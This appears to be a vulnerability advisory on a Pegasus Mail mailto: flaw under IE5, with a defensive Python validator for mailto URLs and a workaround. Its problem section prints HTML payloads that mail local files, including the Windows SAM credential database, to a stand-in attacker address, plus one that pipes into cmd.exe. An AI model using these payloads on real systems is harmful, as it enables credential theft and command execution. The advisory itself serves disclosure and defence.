COMMAND

    Pegasus

SYSTEMS AFFECTED

    Pegasus Mail v3.12c with IE5.0

PROBLEM

    Imran Ghory found the following.  Consider this HTML:

        <a href="mailto:hacker@hakersite.com -F c:\test.txt"> Click here</a>

    When the user clicks on "Click here", Pegasus Mail will
    automatically create a message which contains a copy of the file
    "c:\test.txt" and is addressed to "hacker@hakersite.com", and
    queue it ready to be sent without any further user intervention.

    If, instead of "hacker@hakersite.com", we have a local user,
    "hacker", the message won't be queued but is sent immediately.

    Imagine a page like:

        <body onload="mailto:hacker@hakersite.com -F c:\winnt\repair\sam._">

    There goes your user account/hash database.  What about pipes:

        <body onload="mailto:hacker@hakersite.com -F c:\winnt\repair\sam._ | cmd.exe /c echo I can any command I want">

    Please note that the URL as presented in the report will not work
    correctly on the majority of systems - Pegasus Mail requires the
    formal RFC1738 syntax for URLs containing spaces.  But if properly
    represented, it could produce the described effect.

SOLUTION

    Pegasus currently has a replacement component in development
    which handles the link between the browser and Pegasus Mail: this
    component was developed primarily to deal with other
    non-security-related problems, but they will add some code to it
    to detect links that send files (something that should never
    happen in normal use) and release it publicly as soon as is
    humanly possible.
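
    As an added illustration (not Pegasus or WSendTo code), one way a
    mailto: handler could detect such links: decode the URL, then
    accept only clean address lists.  The address pattern, the allowed
    header names and all function names are assumptions made for this
    example; the sample URLs in the checks are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote

# Assumption: a deliberately strict address pattern (narrower than RFC 5322).
# The first character must be alphanumeric, so a token such as "-F" can
# never pass as a recipient; bare local user names are allowed.
ADDR_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._+-]*(@[A-Za-z0-9][A-Za-z0-9.-]*)?")
ADDRESS_HEADERS = {"to", "cc", "bcc"}   # assumption: headers carrying addresses
TEXT_HEADERS = {"subject", "body"}      # assumption: free-text headers allowed


def _addresses(field):
    """Split a decoded, comma-separated address field and validate each entry."""
    found = [a for a in field.split(",") if a]
    for addr in found:
        if not ADDR_RE.fullmatch(addr):
            raise ValueError(f"rejected address field {addr!r}")
    return found


def parse_mailto(url):
    """Return (recipients, headers) for a mailto: URL, or raise ValueError."""
    scheme, sep, rest = url.partition(":")
    if not sep or scheme.lower() != "mailto":
        raise ValueError("not a mailto: URL")
    to_part, _, query = rest.partition("?")
    # Decode %XX escapes first: the advisory notes that the RFC 1738 encoded
    # form is the one Pegasus Mail accepts, so validate the decoded text.
    recipients = _addresses(unquote(to_part))
    headers = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        name = name.lower()
        if name in ADDRESS_HEADERS:
            _addresses(value)
        elif name not in TEXT_HEADERS:
            raise ValueError(f"unexpected header {name!r}")
        headers.append((name, value))
    return recipients, headers


def is_safe(url):
    """True only if every address field is a clean address list."""
    try:
        parse_mailto(url)
        return True
    except ValueError:
        return False
```

    A handler built this way would pass only the validated recipients
    and headers to the mailer, never the raw URL text.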

    The workaround is to NOT configure Pegasus to be the default
    mailer for IE.  This is, unfortunately, a user-specified option at
    install time, not the default.  Also, queuing of outgoing mail
    allows for pre-delivery review.  A pain, but until a fix, this is
    it.

    Be aware, the -F switch will only include a file in the body of a
    message; it will NOT attach a binary.  The -B switch will
    accomplish this from the command line, but not via IE.  It seems
    this is more of an IE mailto: implementation issue than a Pmail
    one.

    WSendTo is a Pegasus Mail add-on utility that improves the
    integration between Microsoft Internet Explorer and Pegasus Mail.
    It also adds Pegasus Mail as an option on the Windows Explorer
    "Send To" menu and protects against a potential security hole
    discovered recently by a member of the BugTraq forum.  WSendTo
    requires Windows 95 OSR2 or later or Windows NT 4.0 or later, and
    works with either the 16- or 32-bit versions of Pegasus Mail.
    WSendTo can be downloaded from http://www.pmail.com.